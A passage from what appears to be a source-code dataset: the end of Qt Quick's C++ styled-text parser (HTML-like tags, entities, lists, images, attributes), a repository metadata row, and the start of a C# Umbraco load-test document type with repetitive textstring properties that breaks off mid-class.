    static QString toRoman(int value, bool upper);

    QString text;
    QTextLayout &layout;
    QList<QQuickStyledTextImgTag*> *imgTags;
    QFont baseFont;
    QStack<List> listStack;
    QUrl baseUrl;
    bool hasNewLine;          // last emitted character was a line separator
    int nbImages;
    bool updateImagePositions;
    bool preFormat;           // inside <pre>: keep whitespace and newlines
    bool prependSpace;        // a collapsed space is pending before next text
    bool hasSpace;            // output currently ends with whitespace
    bool preloadImages;
    bool *fontSizeModified;
    QQmlContext *context;

    // Frequently-compared markup characters, defined once below the class.
    static const QChar lessThan;
    static const QChar greaterThan;
    static const QChar equals;
    static const QChar singleQuote;
    static const QChar doubleQuote;
    static const QChar slash;
    static const QChar ampersand;
    static const QChar bullet;
    static const QChar disc;
    static const QChar square;
    static const QChar lineFeed;
    static const QChar space;
    static const int tabsize = 6;
};
// Out-of-class definitions for the static markup/list-marker characters
// declared in QQuickStyledTextPrivate.
const QChar QQuickStyledTextPrivate::lessThan(QLatin1Char('<'));
const QChar QQuickStyledTextPrivate::greaterThan(QLatin1Char('>'));
const QChar QQuickStyledTextPrivate::equals(QLatin1Char('='));
const QChar QQuickStyledTextPrivate::singleQuote(QLatin1Char('\''));
const QChar QQuickStyledTextPrivate::doubleQuote(QLatin1Char('\"'));
const QChar QQuickStyledTextPrivate::slash(QLatin1Char('/'));
const QChar QQuickStyledTextPrivate::ampersand(QLatin1Char('&'));
const QChar QQuickStyledTextPrivate::bullet(0x2022);
const QChar QQuickStyledTextPrivate::disc(0x25e6);
const QChar QQuickStyledTextPrivate::square(0x25a1);
const QChar QQuickStyledTextPrivate::lineFeed(QLatin1Char('\n'));
const QChar QQuickStyledTextPrivate::space(QLatin1Char(' '));
// Builds the private parser state only; nothing is parsed until
// QQuickStyledTextPrivate::parse() is invoked (see the static parse() below).
QQuickStyledText::QQuickStyledText(const QString &string, QTextLayout &layout,
                                               QList<QQuickStyledTextImgTag*> &imgTags,
                                               const QUrl &baseUrl,
                                               QQmlContext *context,
                                               bool preloadImages,
                                               bool *fontSizeModified)
    : d(new QQuickStyledTextPrivate(string, layout, imgTags, baseUrl, context, preloadImages, fontSizeModified))
{
}
// Releases the private implementation.
QQuickStyledText::~QQuickStyledText()
{
    delete d;
}
// Static entry point: parses 'string' as styled text, setting the plain text
// and additional format ranges on 'layout'. No-op for an empty string.
// *fontSizeModified is set to true when a tag changes the font size
// (see QQuickStyledTextPrivate::setFontSize).
void QQuickStyledText::parse(const QString &string, QTextLayout &layout,
                                      QList<QQuickStyledTextImgTag*> &imgTags,
                                      const QUrl &baseUrl,
                                      QQmlContext *context,
                                      bool preloadImages,
                                      bool *fontSizeModified)
{
    if (string.isEmpty())
        return;
    QQuickStyledText styledText(string, layout, imgTags, baseUrl, context, preloadImages, fontSizeModified);
    styledText.d->parse();
}
// Main parser loop: walks the input character by character, dispatching on
// '<' (tags), '&' (entities) and whitespace (collapsed outside <pre>), and
// accumulates the plain text in drawText plus a list of format ranges.
// Finally installs both on the QTextLayout.
void QQuickStyledTextPrivate::parse()
{
    QList<QTextLayout::FormatRange> ranges;
    QStack<QTextCharFormat> formatStack;

    QString drawText;
    drawText.reserve(text.count());

    updateImagePositions = !imgTags->isEmpty();

    // textStart/textLength track the current run of plain text in 'text';
    // rangeStart marks where the current format range begins in drawText.
    int textStart = 0;
    int textLength = 0;
    int rangeStart = 0;
    bool formatChanged = false;

    const QChar *ch = text.constData();
    while (!ch->isNull()) {
        if (*ch == lessThan) {
            // Flush the pending plain-text run (or a single collapsed space).
            if (textLength) {
                appendText(text, textStart, textLength, drawText);
            } else if (prependSpace) {
                drawText.append(space);
                prependSpace = false;
                hasSpace = true;
            }

            // Close the current format range before the tag takes effect:
            // either emit a new range or extend the previous one.
            if (rangeStart != drawText.length() && formatStack.count()) {
                if (formatChanged) {
                    QTextLayout::FormatRange formatRange;
                    formatRange.format = formatStack.top();
                    formatRange.start = rangeStart;
                    formatRange.length = drawText.length() - rangeStart;
                    ranges.append(formatRange);
                    formatChanged = false;
                } else if (ranges.count()) {
                    ranges.last().length += drawText.length() - rangeStart;
                }
            }
            rangeStart = drawText.length();
            ++ch;
            if (*ch == slash) {
                // Closing tag: pop the matching format if one was pushed.
                ++ch;
                if (parseCloseTag(ch, text, drawText)) {
                    if (formatStack.count()) {
                        formatChanged = true;
                        formatStack.pop();
                    }
                }
            } else {
                // Opening tag: start from the innermost active format and
                // push the modified format when the tag changes it.
                QTextCharFormat format;
                if (formatStack.count())
                    format = formatStack.top();
                if (parseTag(ch, text, drawText, format)) {
                    formatChanged = true;
                    formatStack.push(format);
                }
            }
            textStart = ch - text.constData() + 1;
            textLength = 0;
        } else if (*ch == ampersand) {
            // HTML entity: flush pending text, then decode the entity.
            ++ch;
            appendText(text, textStart, textLength, drawText);
            parseEntity(ch, text, drawText);
            textStart = ch - text.constData() + 1;
            textLength = 0;
        } else if (ch->isSpace()) {
            if (textLength)
                appendText(text, textStart, textLength, drawText);
            if (!preFormat) {
                // Outside <pre>: collapse a whitespace run to one pending space.
                prependSpace = !hasSpace;
                for (const QChar *n = ch + 1; !n->isNull() && n->isSpace(); ++n)
                    ch = n;
                hasNewLine = false;
            } else if (*ch == lineFeed) {
                drawText.append(QChar(QChar::LineSeparator));
                hasNewLine = true;
            } else {
                // Inside <pre>, other whitespace becomes non-breaking spaces.
                drawText.append(QChar(QChar::Nbsp));
                hasNewLine = false;
            }
            textStart = ch - text.constData() + 1;
            textLength = 0;
        } else {
            ++textLength;
        }
        if (!ch->isNull())
            ++ch;
    }
    // Flush any trailing text and close the last open format range.
    if (textLength)
        appendText(text, textStart, textLength, drawText);
    if (rangeStart != drawText.length() && formatStack.count()) {
        if (formatChanged) {
            QTextLayout::FormatRange formatRange;
            formatRange.format = formatStack.top();
            formatRange.start = rangeStart;
            formatRange.length = drawText.length() - rangeStart;
            ranges.append(formatRange);
        } else if (ranges.count()) {
            ranges.last().length += drawText.length() - rangeStart;
        }
    }
    layout.setText(drawText);
    layout.setAdditionalFormats(ranges);
}
// Copies the [start, start + length) substring of textIn onto textOut,
// first emitting a single separator space if one was pending. Since textOut
// now ends in non-whitespace content, the whitespace-tracking flags are
// cleared.
void QQuickStyledTextPrivate::appendText(const QString &textIn, int start, int length, QString &textOut)
{
    if (prependSpace) {
        textOut.append(space);
        prependSpace = false;
    }
    textOut.append(QStringRef(&textIn, start, length));
    hasNewLine = false;
    hasSpace = false;
}
//
// Calculates and sets the correct font size in points
// depending on the size multiplier and base font.
// 'size' indexes the 7-entry scaling table (expected range 1..7, matching
// the <font size="1-7"> attribute and header levels). A pixel-sized base
// font is converted to points via the default screen DPI.
//
void QQuickStyledTextPrivate::setFontSize(int size, QTextCharFormat &format)
{
    static const qreal scaling[] = { 0.7, 0.8, 1.0, 1.2, 1.5, 2.0, 2.4 };
    if (baseFont.pointSizeF() != -1)
        format.setFontPointSize(baseFont.pointSize() * scaling[size - 1]);
    else
        format.setFontPointSize(baseFont.pixelSize() * qreal(72.) / qreal(qt_defaultDpi()) * scaling[size - 1]);
    // Tell the caller the layout's font size no longer matches the base font.
    *fontSizeModified = true;
}
// Parses one opening tag whose name starts at *ch (just past the '<') and
// applies its effect to textOut and/or 'format'.
//
// Returns true when the tag modified 'format' (the caller must then restore
// the format when the matching close tag is seen), false when it only
// affected the output text (e.g. <br>, <li>) or was not recognized.
//
// On return 'ch' has been advanced past the tag's closing '>' (or to the end
// of the input for a malformed tag).
bool QQuickStyledTextPrivate::parseTag(const QChar *&ch, const QString &textIn, QString &textOut, QTextCharFormat &format)
{
    skipSpace(ch);
    // The tag name is referenced in place inside textIn (no copy).
    int tagStart = ch - textIn.constData();
    int tagLength = 0;
    while (!ch->isNull()) {
        if (*ch == greaterThan) {
            if (tagLength == 0)
                return false; // "<>" — empty tag, nothing to do
            QStringRef tag(&textIn, tagStart, tagLength);
            const QChar char0 = tag.at(0);
            // Dispatch on the first character first so the common
            // single-letter tags stay cheap.
            if (char0 == QLatin1Char('b')) {
                if (tagLength == 1) {
                    // <b>
                    format.setFontWeight(QFont::Bold);
                    return true;
                } else if (tagLength == 2 && tag.at(1) == QLatin1Char('r')) {
                    // <br>: emit a line separator; no format change.
                    textOut.append(QChar(QChar::LineSeparator));
                    hasSpace = true;
                    prependSpace = false;
                    return false;
                }
            } else if (char0 == QLatin1Char('i')) {
                if (tagLength == 1) {
                    // <i>
                    format.setFontItalic(true);
                    return true;
                }
            } else if (char0 == QLatin1Char('p')) {
                if (tagLength == 1) {
                    // <p>: start a new paragraph line if not already on one.
                    if (!hasNewLine)
                        textOut.append(QChar::LineSeparator);
                    hasSpace = true;
                    prependSpace = false;
                } else if (tag == QLatin1String("pre")) {
                    // <pre>: fixed-pitch font, whitespace preserved until </pre>.
                    preFormat = true;
                    if (!hasNewLine)
                        textOut.append(QChar::LineSeparator);
                    format.setFontFamily(QString::fromLatin1("Courier New,courier"));
                    format.setFontFixedPitch(true);
                    return true;
                }
            } else if (char0 == QLatin1Char('u')) {
                if (tagLength == 1) {
                    // <u>
                    format.setFontUnderline(true);
                    return true;
                } else if (tag == QLatin1String("ul")) {
                    // <ul> with no attributes: push a bullet list level.
                    List listItem;
                    listItem.level = 0;
                    listItem.type = Unordered;
                    listItem.format = Bullet;
                    listStack.push(listItem);
                }
            } else if (char0 == QLatin1Char('h') && tagLength == 2) {
                // <h1>..<h6>: bold header, larger size for smaller level.
                int level = tag.at(1).digitValue();
                if (level >= 1 && level <= 6) {
                    if (!hasNewLine)
                        textOut.append(QChar::LineSeparator);
                    hasSpace = true;
                    prependSpace = false;
                    setFontSize(7 - level, format);
                    format.setFontWeight(QFont::Bold);
                    return true;
                }
            } else if (tag == QLatin1String("strong")) {
                format.setFontWeight(QFont::Bold);
                return true;
            } else if (tag == QLatin1String("ol")) {
                // <ol> with no attributes: push a decimal-numbered list level.
                List listItem;
                listItem.level = 0;
                listItem.type = Ordered;
                listItem.format = Decimal;
                listStack.push(listItem);
            } else if (tag == QLatin1String("li")) {
                // <li>: emit indentation and the item marker for the current
                // (innermost) list level.
                if (!hasNewLine)
                    textOut.append(QChar(QChar::LineSeparator));
                if (!listStack.isEmpty()) {
                    // level doubles as the running item counter for this list.
                    int count = ++listStack.top().level;
                    // One tab of non-breaking spaces per nesting depth.
                    for (int i = 0; i < listStack.size(); ++i)
                        textOut += QString(tabsize, QChar::Nbsp);
                    switch (listStack.top().format) {
                    case Decimal:
                        textOut += QString::number(count) % QLatin1Char('.');
                        break;
                    case LowerAlpha:
                        textOut += toAlpha(count, false) % QLatin1Char('.');
                        break;
                    case UpperAlpha:
                        textOut += toAlpha(count, true) % QLatin1Char('.');
                        break;
                    case LowerRoman:
                        textOut += toRoman(count, false) % QLatin1Char('.');
                        break;
                    case UpperRoman:
                        textOut += toRoman(count, true) % QLatin1Char('.');
                        break;
                    case Bullet:
                        textOut += bullet;
                        break;
                    case Disc:
                        textOut += disc;
                        break;
                    case Square:
                        textOut += square;
                        break;
                    }
                    // Gap between the marker and the item text.
                    textOut += QString(2, QChar::Nbsp);
                }
            }
            return false;
        } else if (ch->isSpace()) {
            // may have params.
            QStringRef tag(&textIn, tagStart, tagLength);
            if (tag == QLatin1String("font"))
                return parseFontAttributes(ch, textIn, format);
            if (tag == QLatin1String("ol")) {
                parseOrderedListAttributes(ch, textIn);
                return false; // doesn't modify format
            }
            if (tag == QLatin1String("ul")) {
                parseUnorderedListAttributes(ch, textIn);
                return false; // doesn't modify format
            }
            if (tag == QLatin1String("a")) {
                return parseAnchorAttributes(ch, textIn, format);
            }
            if (tag == QLatin1String("img")) {
                parseImageAttributes(ch, textIn, textOut);
                return false;
            }
            // 'continue' skips the ++ch below so a '>' left by an attribute
            // parser is handled by the greaterThan branch on the next pass.
            if (*ch == greaterThan || ch->isNull())
                continue;
        } else if (*ch != slash) {
            // '/' is ignored so "<br/>" parses the same as "<br>".
            tagLength++;
        }
        ++ch;
    }
    return false;
}
// Parses one closing tag ("</...>"; *ch points just past the '/') and undoes
// the tag's text-level effects (paragraph breaks, list nesting).
//
// Returns true when the matching open tag had modified the character format
// (so the caller must pop/restore the saved format), false otherwise.
bool QQuickStyledTextPrivate::parseCloseTag(const QChar *&ch, const QString &textIn, QString &textOut)
{
    skipSpace(ch);
    int tagStart = ch - textIn.constData();
    int tagLength = 0;
    while (!ch->isNull()) {
        if (*ch == greaterThan) {
            if (tagLength == 0)
                return false; // "</>" — nothing to close
            QStringRef tag(&textIn, tagStart, tagLength);
            const QChar char0 = tag.at(0);
            // Any close tag ends the "just emitted a newline" state unless a
            // branch below explicitly sets it again.
            hasNewLine = false;
            if (char0 == QLatin1Char('b')) {
                if (tagLength == 1)
                    return true;                 // </b> — format was changed
                else if (tag.at(1) == QLatin1Char('r') && tagLength == 2)
                    return false;                // </br> — no format change
            } else if (char0 == QLatin1Char('i')) {
                if (tagLength == 1)
                    return true;                 // </i>
            } else if (char0 == QLatin1Char('a')) {
                if (tagLength == 1)
                    return true;                 // </a>
            } else if (char0 == QLatin1Char('p')) {
                if (tagLength == 1) {
                    // </p>: terminate the paragraph line.
                    textOut.append(QChar::LineSeparator);
                    hasNewLine = true;
                    hasSpace = true;
                    return false;
                } else if (tag == QLatin1String("pre")) {
                    // </pre>: leave preformatted mode; format was changed.
                    preFormat = false;
                    if (!hasNewLine)
                        textOut.append(QChar::LineSeparator);
                    hasNewLine = true;
                    hasSpace = true;
                    return true;
                }
            } else if (char0 == QLatin1Char('u')) {
                if (tagLength == 1)
                    return true;                 // </u>
                else if (tag == QLatin1String("ul")) {
                    // </ul>: pop one list level; a newline is emitted only
                    // when the outermost list is closed.
                    if (!listStack.isEmpty()) {
                        listStack.pop();
                        if (!listStack.count())
                            textOut.append(QChar::LineSeparator);
                    }
                    return false;
                }
            } else if (char0 == QLatin1Char('h') && tagLength == 2) {
                // </h1>..</h6>: end the header line; format was changed.
                textOut.append(QChar::LineSeparator);
                hasNewLine = true;
                hasSpace = true;
                return true;
            } else if (tag == QLatin1String("font")) {
                return true;
            } else if (tag == QLatin1String("strong")) {
                return true;
            } else if (tag == QLatin1String("ol")) {
                // </ol>: same unwinding as </ul>.
                if (!listStack.isEmpty()) {
                    listStack.pop();
                    if (!listStack.count())
                        textOut.append(QChar::LineSeparator);
                }
                return false;
            } else if (tag == QLatin1String("li")) {
                return false;
            }
            return false; // unknown close tag — ignore
        } else if (!ch->isSpace()) {
            tagLength++;
        }
        ++ch;
    }
    return false;
}
void QQuickStyledTextPrivate::parseEntity(const QChar *&ch, const QString &textIn, QString &textOut)
{
int entityStart = ch - textIn.constData();
int entityLength = 0;
while (!ch->isNull()) {
if (*ch == QLatin1Char(';')) {
QStringRef entity(&textIn, entityStart, entityLength);
if (entity == QLatin1String("gt"))
textOut += QChar(62);
else if (entity == QLatin1String("lt"))
textOut += QChar(60);
else if (entity == QLatin1String("amp"))
textOut += QChar(38);
else if (entity == QLatin1String("quot"))
textOut += QChar(34);
return;
}
++entityLength;
++ch;
}
}
bool QQuickStyledTextPrivate::parseFontAttributes(const QChar *&ch, const QString &textIn, QTextCharFormat &format)
{
bool valid = false;
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
if (attr.first == QLatin1String("color")) {
valid = true;
format.setForeground(QColor(attr.second.toString()));
} else if (attr.first == QLatin1String("size")) {
valid = true;
int size = attr.second.toString().toInt();
if (attr.second.at(0) == QLatin1Char('-') || attr.second.at(0) == QLatin1Char('+'))
size += 3;
if (size >= 1 && size <= 7)
setFontSize(size, format);
}
} while (!ch->isNull() && !attr.first.isEmpty());
return valid;
}
bool QQuickStyledTextPrivate::parseOrderedListAttributes(const QChar *&ch, const QString &textIn)
{
bool valid = false;
List listItem;
listItem.level = 0;
listItem.type = Ordered;
listItem.format = Decimal;
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
if (attr.first == QLatin1String("type")) {
valid = true;
if (attr.second == QLatin1String("a"))
listItem.format = LowerAlpha;
else if (attr.second == QLatin1String("A"))
listItem.format = UpperAlpha;
else if (attr.second == QLatin1String("i"))
listItem.format = LowerRoman;
else if (attr.second == QLatin1String("I"))
listItem.format = UpperRoman;
}
} while (!ch->isNull() && !attr.first.isEmpty());
listStack.push(listItem);
return valid;
}
bool QQuickStyledTextPrivate::parseUnorderedListAttributes(const QChar *&ch, const QString &textIn)
{
bool valid = false;
List listItem;
listItem.level = 0;
listItem.type = Unordered;
listItem.format = Bullet;
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
if (attr.first == QLatin1String("type")) {
valid = true;
if (attr.second == QLatin1String("disc"))
listItem.format = Disc;
else if (attr.second == QLatin1String("square"))
listItem.format = Square;
}
} while (!ch->isNull() && !attr.first.isEmpty());
listStack.push(listItem);
return valid;
}
bool QQuickStyledTextPrivate::parseAnchorAttributes(const QChar *&ch, const QString &textIn, QTextCharFormat &format)
{
bool valid = false;
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
if (attr.first == QLatin1String("href")) {
format.setAnchorHref(attr.second.toString());
format.setAnchor(true);
format.setFontUnderline(true);
valid = true;
}
} while (!ch->isNull() && !attr.first.isEmpty());
return valid;
}
// Consumes the attribute list of an <img> tag.
//
// First pass (updateImagePositions == false): builds a QQuickStyledTextImgTag
// from the src/width/height/align attributes, optionally preloads local
// images to learn their implicit size, and appends the tag to imgTags
// (ownership transfers to the list). Subsequent passes only refresh each
// stored tag's text position. In both cases a run of non-breaking spaces as
// wide as the image is inserted into textOut to reserve layout space.
void QQuickStyledTextPrivate::parseImageAttributes(const QChar *&ch, const QString &textIn, QString &textOut)
{
    qreal imgWidth = 0.0;
    if (!updateImagePositions) {
        QQuickStyledTextImgTag *image = new QQuickStyledTextImgTag;
        // +1: the image anchors after the space appended below.
        image->position = textOut.length() + 1;
        QPair<QStringRef,QStringRef> attr;
        do {
            attr = parseAttribute(ch, textIn);
            if (attr.first == QLatin1String("src")) {
                image->url = QUrl(attr.second.toString());
            } else if (attr.first == QLatin1String("width")) {
                image->size.setWidth(attr.second.toString().toInt());
            } else if (attr.first == QLatin1String("height")) {
                image->size.setHeight(attr.second.toString().toInt());
            } else if (attr.first == QLatin1String("align")) {
                if (attr.second.toString() == QLatin1String("top")) {
                    image->align = QQuickStyledTextImgTag::Top;
                } else if (attr.second.toString() == QLatin1String("middle")) {
                    image->align = QQuickStyledTextImgTag::Middle;
                }
            }
        } while (!ch->isNull() && !attr.first.isEmpty());
        if (preloadImages && !image->size.isValid()) {
            // if we don't know its size but the image is a local image,
            // we load it in the pixmap cache and save its implicit size
            // to avoid a relayout later on.
            QUrl url = baseUrl.resolved(image->url);
            if (url.isLocalFile()) {
                image->pix = new QQuickPixmap(context->engine(), url, image->size);
                if (image->pix && image->pix->isReady()) {
                    image->size = image->pix->implicitSize();
                } else {
                    // Not ready synchronously: discard the pixmap and fall
                    // back to laying out without a known size.
                    delete image->pix;
                    image->pix = 0;
                }
            }
        }
        imgWidth = image->size.width();
        imgTags->append(image);
    } else {
        // if we already have a list of img tags for this text
        // we only want to update the positions of these tags.
        // NOTE(review): value(nbImages) returns a default-constructed (null)
        // pointer when the tag counts get out of sync — presumably callers
        // guarantee the same text is reparsed; confirm before relying on it.
        QQuickStyledTextImgTag *image = imgTags->value(nbImages);
        image->position = textOut.length() + 1;
        imgWidth = image->size.width();
        QPair<QStringRef,QStringRef> attr;
        do {
            // Attributes were captured on the first pass; just consume them.
            attr = parseAttribute(ch, textIn);
        } while (!ch->isNull() && !attr.first.isEmpty());
        nbImages++;
    }
    // Reserve horizontal space: enough Nbsp characters to cover the image
    // width, framed by a regular space on each side.
    QFontMetricsF fm(layout.font());
    QString padding(qFloor(imgWidth / fm.width(QChar::Nbsp)), QChar::Nbsp);
    textOut += QLatin1Char(' ');
    textOut += padding;
    textOut += QLatin1Char(' ');
}
// Reads one name='value' (or name="value") attribute starting at *ch.
//
// Returns the (name, value) pair as references into textIn, or a pair of
// null refs when there is no further well-formed attribute. Unquoted values
// are not supported: on name=value the rest of the tag is skipped up to '>'.
// On success ch points just past the value's closing quote.
QPair<QStringRef,QStringRef> QQuickStyledTextPrivate::parseAttribute(const QChar *&ch, const QString &textIn)
{
    skipSpace(ch);
    int attrStart = ch - textIn.constData();
    int attrLength = 0;
    while (!ch->isNull()) {
        if (*ch == greaterThan) {
            // End of tag before any '=' — no more attributes. The '>' is
            // deliberately left unconsumed for the caller.
            break;
        } else if (*ch == equals) {
            ++ch;   // step onto the (expected) opening quote
            if (*ch != singleQuote && *ch != doubleQuote) {
                // Unquoted value: skip the remainder of the tag.
                while (*ch != greaterThan && !ch->isNull())
                    ++ch;
                break;
            }
            ++ch;   // step past the opening quote onto the value
            if (!attrLength)
                break; // "='...'" with no attribute name
            QStringRef attr(&textIn, attrStart, attrLength);
            QStringRef val = parseValue(ch, textIn);
            if (!val.isEmpty())
                return QPair<QStringRef,QStringRef>(attr,val);
            break;
        } else {
            ++attrLength;
        }
        ++ch;
    }
    return QPair<QStringRef,QStringRef>();
}
// Reads a quoted attribute value; *ch points at the first character after
// the opening quote. Returns a reference into textIn spanning the value and
// leaves ch just past the closing quote, or a null ref when the input ends
// before a closing quote is found.
QStringRef QQuickStyledTextPrivate::parseValue(const QChar *&ch, const QString &textIn)
{
    const int valStart = ch - textIn.constData();
    int valLength = 0;
    for (; !ch->isNull() && *ch != singleQuote && *ch != doubleQuote; ++ch)
        ++valLength;
    if (ch->isNull())
        return QStringRef(); // unterminated value
    ++ch; // consume the closing quote
    return QStringRef(&textIn, valStart, valLength);
}
// Converts a 1-based list-item count into spreadsheet-style alphabetic
// numbering (1 -> "a", 26 -> "z", 27 -> "aa", ...), upper- or lowercase.
QString QQuickStyledTextPrivate::toAlpha(int value, bool upper)
{
    const char baseChar = upper ? 'A' : 'a';
    QString result;
    // Bijective base-26: decrement before taking the digit so that 'z'
    // (not a leading zero) is the 26th symbol.
    for (int remaining = value; remaining > 0; remaining /= 26) {
        --remaining;
        result.prepend(QChar(baseChar + (remaining % 26)));
    }
    return result;
}
// Converts a 1-based list-item count into roman numerals ("i", "iv", ... or
// uppercase), for values below 5000. Out-of-range values yield "?".
QString QQuickStyledTextPrivate::toRoman(int value, bool upper)
{
    QString result = QLatin1String("?");
    // works for up to 4999 items
    if (value < 5000) {
        QByteArray romanNumeral;
        // Packed symbol table. c[] below lists the decimal weights
        // 1,4,5,9,10,40,... and for weight index i the matching glyphs start
        // at string offset i + (i+3)/4: e.g. i=1 (4) -> offset 2 = "iv",
        // i=5 (40) -> offset 7 = "xl", i=12 (1000) -> offset 15 = "m".
        static const char romanSymbolsLower[] = "iiivixxxlxcccdcmmmm";
        static const char romanSymbolsUpper[] = "IIIVIXXXLXCCCDCMMMM";
        QByteArray romanSymbols;
        if (!upper)
            romanSymbols = QByteArray::fromRawData(romanSymbolsLower, sizeof(romanSymbolsLower));
        else
            romanSymbols = QByteArray::fromRawData(romanSymbolsUpper, sizeof(romanSymbolsUpper));
        int c[] = { 1, 4, 5, 9, 10, 40, 50, 90, 100, 400, 500, 900, 1000 };
        int n = value;
        // Greedy decomposition from the largest weight down; n %= c[i]
        // removes the part already emitted.
        for (int i = 12; i >= 0; n %= c[i], i--) {
            int q = n / c[i];
            if (q > 0) {
                int startDigit = i + (i + 3) / 4;
                int numDigits;
                if (i % 4) {
                    // Subtractive pairs (iv, ix, xl, ...) are two glyphs;
                    // single symbols (v, l, d) are one.
                    if ((i - 2) % 4)
                        numDigits = 2;
                    else
                        numDigits = 1;
                }
                else
                    // Repeatable symbols (i, x, c, m): emit q copies, which
                    // the table stores consecutively.
                    numDigits = q;
                romanNumeral.append(romanSymbols.mid(startDigit, numDigits));
            }
        }
        result = QString::fromLatin1(romanNumeral);
    }
    return result;
}
QT_END_NAMESPACE
| adenexter/qtdeclarative | src/quick/util/qquickstyledtext.cpp | C++ | lgpl-2.1 | 30,038 |
namespace Vega.Test.Entities.DocumentTypes.LoadTest
{
    using Vega.USiteBuilder;
    using System;

    /// <summary>
    /// Load-test document type with 100 textstring properties (50 own plus a
    /// "Second" duplicate set), used to stress uSiteBuilder's document-type
    /// synchronization. Inherits a further set of properties from
    /// <see cref="LoadTest4"/>. The property bodies are intentionally
    /// repetitive and carry no domain meaning.
    /// </summary>
    [DocumentType(IconUrl = "doc4.gif",
    Thumbnail = "doc.png",
    Description = "Decription of FirsteLevelDT",
    AllowedTemplates = new string[] { "FirstLevel", "SecondLevel1" },
    DefaultTemplate = "SecondLevel1",
    AllowedChildNodeTypeOf = new Type[] { typeof(LoadTest1), typeof(LoadTest2), typeof(LoadTest3), typeof(LoadTest4) })]
    class LoadTest45 : LoadTest4
    {
        // First block: prop{AAA..EEE}{000..999}, all plain textstrings on
        // the Content tab.
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA111 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propAAA999 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB111 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propBBB999 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC111 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propCCC999 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD111 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD222 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD333 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD444 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD555 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD666 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD777 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD888 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propDDD999 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE000 { get; set; }
        [DocumentTypeProperty(UmbracoPropertyType.Textstring, Tab = TabNames.Content)]
        public string propEEE111 { get; set; }
